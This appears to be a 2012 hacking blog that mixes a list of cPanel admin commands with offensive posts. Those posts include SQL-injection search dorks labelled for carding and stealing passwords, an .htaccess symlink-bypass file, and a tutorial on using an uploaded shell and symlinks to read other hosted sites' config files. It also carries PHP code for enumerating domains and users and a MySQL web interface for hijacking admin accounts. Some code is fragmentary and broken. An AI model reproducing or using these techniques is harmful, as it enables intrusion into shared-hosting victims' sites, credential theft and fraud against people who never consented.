Wednesday, 29 August 2012

VOBHH International SMS Bomber V 1.0

Tuesday, 28 August 2012

cPanel Commands to run in SSH

NOTE: Those who think this is not a use, there might be someone out there who might like these

These are some basic cPanel Commands that should be run in SSH for the required task. Its a very handy list for web hosters and so I suggest you all to bookmark this page.

Restart chkservd:
/etc/init.d/chkservd restart

Tail Apache log:
tail -f /usr/local/apache/logs/error_log

Updates the cpanel server software:

Reinstalls exim:

View traffic or if you think a site is being DDoS:
cd /usr/local/apache/domlogs
tail -f

Correct bandwidth issues

To fix problem in webalizer that stop updating stats

Fix everything

Fixing Mail List MailMan

Reinstall MailMan
pico /etc/my.cnf

Edit php.ini (may be in a differant place if you have Zend installed)
pico /usr/local/lib/php.ini

Edit Apache Conf
pico /etc/httpd/conf/httpd.conf

Checking Real Time Top Processes Login to SSH and run

Run cpanel backup

To try and fix domain controller

/scripts/initquotas - takes a while to run
/scripts/fixquotas - takes a while to run

Add a Dns Entry

Install Frontpage Mail Exts

Add JavaServlets to an account (jsp plugin required)

Add a User

Run WHM Lite

Add Rlimits (cpu and mem limits) to apache

Resync with a master DNS Server

Edit A User’s Quota

Search For Trojans in /dev

Locate Trojan Horses

Suggest Usage
/scripts/findtrojans > /var/log/trojans
/scripts/fixtrojans /var/log/trojans

Make Interchange work with suexec

Fix Most Problems with Interchange

Run on a trojans horse file created by findtrojans to remove them

Run this if a user’s stats stop working

Fix a broken valias file

Turn on DMA and 32bit IDE hard drive access (once per boot)

Re-scan quotas. Usually fixes Disk space display problems

Turn on SUEXEC (probably a bad idea)

Display Ipusage Report

Terminate an Account

Delete “Security Problem Infested RPMS”

Fix Various Mail Permission Problems

Attempt to Troubleshoot a Mail Problem

Change a Mysql Password

Kill Potential Security Problem Services

Rebuild Ip Address Pool

Delete Nasty SSL entry in apache default httpd.conf

Restart a Service (valid services: httpd,proftpd,exim,sshd,cppop,bind,mysql)
/scripts/restartsrv?? (example: /scripts/restartsrv httpd)

Syncup Security Updates from RedHat/Mandrake

Force a webalizer/analog update

Remove non-important suid binaries

Install Frontpage 4+ on an account

Return a Simple process list. Useful for finding where cgi scripts are running from

Suspend an account

Syncup Cpanel RPM Updates

Unblock an IP

UnSuspend an account

Update Cpanel

Update /scripts

Create a New Account

Awstats to run manually
/scripts/runweblogs account_username

License Not working
rdate -s

Sometimes such behavior of apache/httpd (taking more and more memory until it dies or crashes the server) can be caused by corrupted MySQL database. Try to do the following:

1) Kill the mysql server
/etc/rc.d/init.d/mysql stop

2) Repair all SQL databases:
myisamchk -r /var/lib/mysql/*/*.MYI

3) Start mysql again:
/etc/rc.d/init.d/mysql start

Restarting cpanel
/etc/rc.d/init.d/cpanel restart

To run your clients stats now

Restart the background proccess that runs the stats for your clients

To run your clients stats now

To run one clients stats:
/scripts/runweblogsnow username

Shut down http
httpd stop

Start http with SSL
httpd startssl

Start http
httpd start

__________________________________________________ ___

List Short URL Service to hide your phising site!

Google Adsense Secrets 4 [237 Pages] Awsome ebook!

Joomla Mass Scanner

Usage :

python <site> <options>
-p/-proxy <host:port> : Add proxy support
-404 : Won't show 404 responses
Ex: python -404 -proxy

print"# Joomla Mass Scanner Vulnerability                #"
print"# Coded By Angel Injection                         #"
print"# Copyright 2011-2012                              #"
print"# , #"

import sys, re, httplib, time, socket

def main(path):
  if proxy != 0:
   h.putrequest("GET", "http://"+host+"/"+path)
   h.putrequest("HEAD", path)
  h.putheader("Host", host)
  status, reason, headers = h.getreply()
  return status, reason
 except(), msg: 
  print "Error Occurred:",msg

def timer():
 now = time.localtime(time.time())
 return time.asctime(now)

if len(sys.argv) < 2 or len(sys.argv) > 5:
 print "\nUsage: python <site> <options>"
 print "\t[options]"
 print "\t   -p/-proxy <host:port> : Add proxy support"
 print "\t   -404 : Won't show 404 responses"
 print "Ex: python -404 -proxy\n"

Htaccess Bypass Symlink

Hi Guys :X

This Htaccess Is For Bypass Symlink... 
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

Share Powerfull Dork

"you have an error in your sql syntax" inurl:/details.php?id=
"you have an error in your sql syntax" inurl:/events.php?id=
"you have an error in your sql syntax" inurl:/articles.php?id=
"you have an error in your sql syntax" inurl:/artist.php?id=
"you have an error in your sql syntax" inurl:/viewarticle.php?id=

For Making a Carding :-

"you have an error in your sql syntax" inurl:/products.php?id=
"you have an error in your sql syntax" inurl:/price.php?id=
"you have an error in your sql syntax" inurl:/buy.php?id=
"you have an error in your sql syntax" inurl:/cart.php?id=

To Find Email and Password :-

"you have an error in your sql syntax" inurl:/member.php?id=
"you have an error in your sql syntax" inurl:/comments.php?id=

Saturday, 25 August 2012

Symlink Full TuT

Hello guy, This is Maher Bro today I will explain how symlinking process goes step by step, in two different methods

#First Method:-
After uploading the shell make a new directory by an option or execute this command:

Quote:mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
  AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
as you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
[Image: kaoknd.png]
Then, execute this command:
Quote:ln -s / root
so now in our directory "sym" we have the ".htaccess" and something like this [root] (which is a symlink to /root directory)
and it will look like this:
[Image: 15g9qx4.png]
cool guyz? lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
hit enter, now you should see something like this:
[Image: 4l6fv.png]
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:

#Ofcourse replace =>(user) with the target website user.
you will see something like this:
[Image: mr8mrb.png]
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:

Quote:vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
[Image: 14abedw.png]
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
[Image: 14jnjfl.png]
I'll tell you what to do after that in the end!
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php
#Finally symlink the target website with this command:
Quote:ln -s /home/(user)/public_html (user)
then enter your directory put the URL like this:
and you should see something like this:
[Image: 14v192q.png]
in this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
hope you liked it! 
PHP Code:
echo "<title>Priv8 # Domains & Users</title>
body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
<p align=center># Domains & Users</p>
<p align=center>by Priv8 </p>

$d0mains = @file("/etc/named.conf");

if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }

echo "<table align=center border=1>
<tr bgcolor=green><td>Domains</td><td>Users</td></tr>";

foreach($d0mains as $d0main){


preg_match_all('#zone "(.*)"#', $d0main, $domains);

if(strlen(trim($domains[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();


echo "</table>
<p align='center'> Priv8

PHP Code:
 * MySQL Web Interface By JIKo
 * -------------------------------
 * Developed By sNiper_hEx

if ( function_exists('ini_get') ) {
    $onoff = ini_get('register_globals');
} else {
    $onoff = get_cfg_var('register_globals');
if ($onoff != 1) {
    @extract($HTTP_POST_FILES, EXTR_SKIP);
    @extract($HTTP_POST_VARS, EXTR_SKIP);
    @extract($HTTP_GET_VARS, EXTR_SKIP);
    @extract($HTTP_ENV_VARS, EXTR_SKIP);

function logon() {
    global $PHP_SELF;

    setcookie( "mysql_web_admin_username" );
    setcookie( "mysql_web_admin_password" );
    setcookie( "mysql_web_admin_hostname" );
    echo "<html>\n";
    echo "<head>\n";
    echo "<title>MySQL New by jiko</title>\n";
    echo "</head>\n";
    echo "<body>\n";
    echo "<table width=100% height=100%><tr><td><center>\n";
    echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
    echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
    echo "<h1>MySQL Web by jiko</h1>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=logon_submit>\n";
    echo "<table cellpadding=5 cellspacing=1>\n";
    echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
    echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
    echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
    echo "</table><p>\n";
    echo "<input type=submit value='Enter'>\n";
    echo "<input type=reset value='Clear'><br>\n";
    echo "</form>\n";
    echo "</center></td></tr></table>\n";
    echo "</center></td></tr></table>\n";
    echo "<p><hr width=300>\n";
    echo "</center></td></tr></table>\n";
    echo "</body>\n";
    echo "</html>\n";

function logon_submit() {
    global $username, $password, $hostname ,$PHP_SELF;
    if($hostname =='')
        $hostname = 'localhost';
    setcookie( "mysql_web_admin_username", $username );
    setcookie( "mysql_web_admin_password", $password );
    setcookie( "mysql_web_admin_hostname", $hostname );
    echo "<html>";
    echo "<head>";
    echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
    echo "</head>";
    echo "</html>";

function echoQueryResult() {
    global $queryStr, $errMsg;

    if( $errMsg == "" ) $errMsg = "Success";
    if( $queryStr != "" ) {
        echo "<table cellpadding=5>\n";
        echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
        echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
        echo "</table><p>\n";

function listDatabases() {
    global $mysqlHandle, $PHP_SELF;

    echo "<h1>Databases List</h1>\n";

    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createDB>\n";
    echo "<input type=text name=dbname>\n";
    echo "<input type=submit value='Create Database'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    echo "<table cellspacing=1 cellpadding=5>\n";

    $pDB = mysql_list_dbs( $mysqlHandle );
    $num = mysql_num_rows( $pDB );
    for( $i = 0; $i < $num; $i++ ) {
        $dbname = mysql_dbname( $pDB, $i );
        echo "<tr>\n";
        echo "<td>$dbname</td>\n";
        echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
        echo "</tr>\n";
    echo "</table>\n";

function createDatabase() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    mysql_create_db( $dbname, $mysqlHandle );

function dropDatabase() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    mysql_drop_db( $dbname, $mysqlHandle );

function listTables() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    echo "<h1>Tables List</h1>\n";
    echo "<p class=location>$dbname</p>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createTable>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text name=tablename>\n";
    echo "<input type=submit value='Create Table'>\n";
    echo "</form>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=query>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text size=120 name=queryStr>\n";
    echo "<input type=submit value='Query'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    $pTable = mysql_list_tables( $dbname );

    if( $pTable == 0 ) {
        $msg  = mysql_error();
        echo "<h3>Error : $msg</h3><p>\n";
    $num = mysql_num_rows( $pTable );

    echo "<table cellspacing=1 cellpadding=5>\n";

    for( $i = 0; $i < $num; $i++ ) {
        $tablename = mysql_tablename( $pTable, $i );

        echo "<tr>\n";
        echo "<td>\n";
        echo "$tablename\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
        echo "</td>\n";
        echo "</tr>\n";

    echo "</table>";

function createTable() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "CREATE TABLE $tablename ( no INT )";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();


function dropTable() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "DROP TABLE $tablename";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();


function viewSchema() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    echo "<h1>Table Schema</h1>\n";
    echo "<p class=location>$dbname > $tablename</p>\n";


    echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
    echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
    echo "<hr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    echo "<table cellspacing=1 cellpadding=5>\n";
    echo "<tr>\n";
    echo "<th>Field</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Null</th>\n";
    echo "<th>Key</th>\n";
    echo "<th>Default</th>\n";
    echo "<th>Extra</th>\n";
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";

    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        echo "<tr>\n";
        echo "<td>".$field["Field"]."</td>\n";
        echo "<td>".$field["Type"]."</td>\n";
        echo "<td>".$field["Null"]."</td>\n";
        echo "<td>".$field["Key"]."</td>\n";
        echo "<td>".$field["Default"]."</td>\n";
        echo "<td>".$field["Extra"]."</td>\n";
        $fieldname = $field["Field"];
        echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
        echo "</tr>\n";
    echo "</table>\n";


function manageField( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Field</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Field</h1>\n";
        $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
        $num = mysql_num_rows( $pResult );
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_array( $pResult );
            if( $field["Field"] == $fieldname ) {
                $fieldtype = $field["Type"];
                $fieldkey = $field["Key"];
                $fieldextra = $field["Extra"];
                $fieldnull = $field["Null"];
                $fielddefault = $field["Default"];
        $type = strtok( $fieldtype, " (,)\n" );
        if( strpos( $fieldtype, "(" ) ) {
            if( $type == "enum" | $type == "set" ) {
                $valuelist = strtok( " ()\n" );
            } else {
                $M = strtok( " (,)\n" );
                if( strpos( $fieldtype, "," ) )
                    $D = strtok( " (,)\n" );

    echo "<p class=location>$dbname > $tablename</p>\n";
    echo "<form action=$PHP_SELF>\n";

    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addField_submit>\n";
    else if( $cmd == "edit" ) {
        echo "<input type=hidden name=action value=editField_submit>\n";
        echo "<input type=hidden name=old_name value=$fieldname>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";

    echo "<h3>Name</h3>\n";
    echo "<input type=text name=name value=$fieldname><p>\n";
    echo '


<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>

<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>

<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td align=center>O</td>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>

<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>

<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>


    if( $cmd == "add" )
        echo "<input type=submit value='Add Field'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Field'>\n";
    echo "<input type=button value=Cancel onClick='history.back()'>\n";
    echo "</form>\n";

function manageField_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
        $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;

    if( $cmd == "add" )
        $queryStr = "ALTER TABLE $tablename ADD $name ";
    else if( $cmd == "edit" )
        $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
    if( $M != "" )
        if( $D != "" )
            $queryStr .= "$type($M,$D) ";
            $queryStr .= "$type($M) ";
    else if( $valuelist != "" ) {
        $valuelist = stripslashes( $valuelist );
        $queryStr .= "$type($valuelist) ";
    } else
        $queryStr .= "$type ";

    $queryStr .= "$unsigned $zerofill $binary ";

    if( $default_value != "" )
        $queryStr .= "DEFAULT '$default_value' ";
    $queryStr .= "$not_null $auto_increment";

    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    // key change
    $keyChange = false;
    $result = mysql_query( "SHOW KEYS FROM $tablename" );
    $primary = "";
    while( $row = mysql_fetch_array($result) )
        if( $row["Key_name"] == "PRIMARY" ) {
            if( $row[Column_name] == $name )
                $keyChange = true;
                $primary .= ", $row[Column_name]";
    if( $primary_key == "PRIMARY KEY" ) {
        $primary .= ", $name";
        $keyChange = !$keyChange;
    $primary = substr( $primary, 2 );
    if( $keyChange == true ) {
        $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
        mysql_query( $q );
        $queryStr .= "<br>\n" . $q;
        $errMsg .= "<br>\n" . mysql_error();
        $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
        mysql_query( $q );
        $queryStr .= "<br>\n" . $q;
        $errMsg .= "<br>\n" . mysql_error();


function dropField() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();


function viewData( $queryStr ) {
    global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;

    echo "<h1>Data in Table</h1>\n";
    if( $tablename != "" )
        echo "<p class=location>$dbname > $tablename</p>\n";
        echo "<p class=location>$dbname</p>\n";

    $queryStr = stripslashes( $queryStr );
    if( $queryStr == "" ) {
        $queryStr = "SELECT * FROM $tablename";
        if( $orderby != "" )
            $queryStr .= " ORDER BY $orderby";
        echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";

    $pResult = mysql_db_query( $dbname, $queryStr );
    $fieldt = mysql_fetch_field($pResult);
    $tablename = $fieldt->table;
    $errMsg = mysql_error();

    $GLOBALS[queryStr] = $queryStr;

    if( $pResult == false ) {
    if( $pResult == 1 ) {
        $errMsg = "Success";

    echo "<hr>\n";

    $row = mysql_num_rows( $pResult );
    $col = mysql_num_fields( $pResult );

    if( $row == 0 ) {
        echo "No Data Exist!";
    if( $rowperpage == "" ) $rowperpage = 30;
    if( $page == "" ) $page = 0;
    else $page--;
    mysql_data_seek( $pResult, $page * $rowperpage );

    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    for( $i = 0; $i < $col; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        echo "<th>";
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
            echo "<font    style='text-decoration:none;color:#000000;font-size:x-small;'>".$field->name."</font>\n";
        echo "</th>\n";
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";

    for( $i = 0; $i < $rowperpage; $i++ ) {
        $rowArray = mysql_fetch_row( $pResult );
        if( $rowArray == false ) break;
        echo "<tr>\n";
        $key = "";
        for( $j = 0; $j < $col; $j++ ) {
            $data = $rowArray[$j];

            $field = mysql_fetch_field( $pResult, $j );
            if( $field->primary_key == 1 )
                $key .= "&" . $field->name . "=" . $data;

            if( strlen( $data ) > 30 )
                $data = substr( $data, 0, 30 ) . "...";
            $data = htmlspecialchars( $data );
            echo "<td>\n";
            echo "$data\n";
            echo "</td>\n";
        if( $key == "" )
            echo "<td colspan=2>no Key</td>\n";
        else {
            echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
            echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
        echo "</tr>\n";
    echo "</table>\n";

    echo "<font size=2>\n";
    if($action == "viewData")
        echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
        echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
    echo "<font color=green>\n";
    echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
    echo "</font>\n";
    echo " | ";
    if( $page > 0 ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Prev</a>\n";
    } else
        echo "Prev";
    echo " | ";
    if( $page < ($row/$rowperpage)-1 ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Next</a>\n";
    } else
        echo "Next";
    echo " | ";
    if( $row > $rowperpage ) {
        echo "<input type=text size=4 name=page>\n";
        echo "<input type=submit value='Go'>\n";
    echo "</form>\n";
    echo "</font>\n";

function manageData( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Data</h1>\n";
